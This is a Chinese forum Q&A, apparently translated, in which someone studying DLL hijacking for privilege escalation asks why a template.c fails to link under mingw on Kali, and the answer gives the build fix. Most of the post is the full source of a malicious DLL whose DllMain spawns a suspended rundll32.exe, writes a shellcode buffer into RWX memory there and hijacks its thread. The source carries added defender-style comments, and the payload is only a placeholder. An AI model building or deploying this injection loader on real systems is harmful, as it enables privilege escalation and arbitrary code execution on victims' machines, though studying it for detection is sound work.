使用 DLL 劫持的权限提升 - 编译 "template.c" 时出错

时间:2016-04-23 21:59:58

标签: windows

我正在学习关于 DLL 劫持的知识，材料是 Vivek 制作的视频 - Privilege Escalation using DLL Hijacking

一切都解释得很清楚，但有一步让我卡住了。它是关于在 Kali Linux 上使用 mingw32 编译 "template.c"。当我按视频中描述的步骤操作时，也就是：

  

root@kali:~# i686-w64-mingw32-gcc-win32 template.c -o template.dll -shared

我仍然收到此错误:

  

/tmp/ccRJy0bd.o:template.c:(.text+0x49): 未定义的引用 `inline_bzero'
collect2: 错误: ld 返回 1 退出状态

以下是 "template.c" 的源代码：
#include <windows.h>
#include "template.h"

#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
    /* Zero l bytes starting at p with a plain byte loop instead of memset(),
     * so that no C-runtime symbol is referenced.  NOTE(review): an optimizing
     * compiler may still recognise this idiom and emit a memset() call --
     * confirm with the build flags actually used. */
    unsigned char *cursor = p;
    unsigned char *end = cursor + l;
    while (cursor != end) {
        *cursor++ = 0;
    }
}

#endif


void ExecutePayload(void);

BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    /* Loader entry point.  Only DLL_PROCESS_ATTACH does any work: it hands
     * control to ExecutePayload() while still inside the loader call-back.
     * Process detach and thread attach/detach are accepted and ignored, as
     * is any other reason code.  hDll and lpReserved are unused.
     *
     * Defender's note: a DLL that spawns and writes into another process
     * straight from DllMain, when loaded from a user-writable search-path
     * location, is the DLL-hijacking pattern this page is about; the
     * attach-time behaviour is what load-order monitoring should surface. */
    (void)hDll;
    (void)lpReserved;

    if (dwReason == DLL_PROCESS_ATTACH) {
        ExecutePayload();
    }

    /* Always report successful initialisation to the loader. */
    return TRUE;
}

/* Copies the bytes in `code` (template.h) into a freshly created, suspended
 * rundll32.exe and redirects that process's initial thread to them, then
 * terminates the calling thread.  Called from DllMain on DLL_PROCESS_ATTACH,
 * i.e. while the loader call-back is still on the stack.
 *
 * Review notes (defender's reading of this block):
 *  - No return value after CreateProcess is checked: GetThreadContext,
 *    VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread
 *    can all fail silently, and `ep` is used even when VirtualAllocEx
 *    returns NULL.
 *  - The CREATE_SUSPENDED -> remote PAGE_EXECUTE_READWRITE allocation ->
 *    WriteProcessMemory -> SetThreadContext -> ResumeThread sequence is the
 *    textbook remote-injection chain; each step is an event endpoint
 *    telemetry is built to record, so this is what detection should key on.
 *  - `error` and `prot` are declared but never used.
 */
void ExecutePayload(void) {
    int error;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    CONTEXT ctx;
    DWORD prot;
   LPVOID ep;

    // Start up the payload in a new process
    // inline_bzero is only compiled when BUILDMODE == 2 (top of template.c);
    // the template.h shown on this page defines no BUILDMODE, so this call is
    // the unresolved symbol in the reported linker error.
    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);

    // Create a suspended rundll32.exe, allocate an RWX region in it (a fresh
    // VirtualAllocEx region, not the stack as the original comment said),
    // copy `code` there, point the primary thread at it and resume it.
    // NOTE(review): lpCommandLine is a string literal; the ANSI variant is
    // assumed here (CreateProcessW documents that it may write to that
    // buffer) -- confirm UNICODE is not defined for this build.
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        // Only the integer/control register set is requested; the block
        // below modifies just the instruction pointer.  If this call fails,
        // the rest of ctx is uninitialised and is still written back below.
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);

       // Remote RWX commit of SCSIZE bytes; NULL on failure is not checked.
       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        // `&code` is the address of the array, i.e. the same pointer value
        // as `code`.  The bytes-written out-parameter is 0, so a short
        // write goes unnoticed.
        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);

// Redirect the suspended thread's instruction pointer to the new region;
// the register name depends on the target architecture.
#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif

        SetThreadContext(pi.hThread,&ctx);

        // The child keeps running after these handles are closed.
        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   // ExitProcess(0);
   // Ends the thread that is executing DllMain, from inside the loader
   // call-back.  NOTE(review): Microsoft's DllMain guidance discourages
   // terminating the thread from within DllMain -- confirm this is intended.
   ExitThread(0);
}

/*
typedef VOID
(NTAPI *PIMAGE_TLS_CALLBACK) (
    PVOID DllHandle,
    ULONG Reason,
    PVOID Reserved
    );

VOID NTAPI TlsCallback(
      IN PVOID DllHandle,
      IN ULONG Reason,
      IN PVOID Reserved)
{
    __asm  ( "int3" );
}

ULONG _tls_index;
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
*/

"template.h"，如果需要的话：

#define SCSIZE 2048
/* Placeholder payload buffer.  template.c copies all SCSIZE bytes into the
 * child process regardless of how many are meaningful.  Note that the
 * template.h shown here defines no BUILDMODE, so template.c's
 * `#if BUILDMODE == 2` guard around inline_bzero evaluates false and the
 * function is never compiled -- which is the unresolved-symbol link error
 * asked about on this page. */
unsigned char code[SCSIZE] = "PAYLOAD:";

解决。

只需删除 "#if BUILDMODE == 2" 和 "#endif" 这两行，然后编译就能成功完成。

1 个答案:


只需删除 "#if BUILDMODE == 2" 和 "#endif" 这两行，即可成功完成编译。